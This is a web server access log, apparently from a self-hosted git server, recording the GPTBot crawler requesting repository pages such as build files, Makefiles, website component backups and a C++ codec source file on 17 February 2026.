"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22138] [Gzip 11.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:16:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" -[17/Feb/2026:16:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" -[17/Feb/2026:16:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" -[17/Feb/2026:16:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23274] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:16:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40977] [Gzip 14.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:16:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" -[17/Feb/2026:16:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" -[17/Feb/2026:16:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23529] [Gzip 11.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:16:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16206] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:16:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23305] [Gzip 11.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:16:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40511] [Gzip 14.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:16:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22384] [Gzip 11.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:16:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40948] [Gzip 14.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:16:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" -[17/Feb/2026:16:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:16:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22351] [Gzip 11.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:16:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" -[17/Feb/2026:16:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14405] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" -[17/Feb/2026:16:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11795] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" -[17/Feb/2026:16:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:16:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=closed" [Client 74.7.227.38] [Length 8481] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:16:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13556] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13555] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 16702] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" -[17/Feb/2026:16:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" -[17/Feb/2026:16:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" -[17/Feb/2026:16:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11542] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" -[17/Feb/2026:16:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" -[17/Feb/2026:16:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11516] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" -[17/Feb/2026:16:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11981] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" -[17/Feb/2026:16:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=open" [Client 74.7.227.38] [Length 8473] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?state=closed" -[17/Feb/2026:16:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14062] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14064] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12806] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" -[17/Feb/2026:16:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" -[17/Feb/2026:16:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:16:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11364] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" -[17/Feb/2026:16:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 9772] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" -[17/Feb/2026:16:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11668] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" -[17/Feb/2026:16:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14710] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 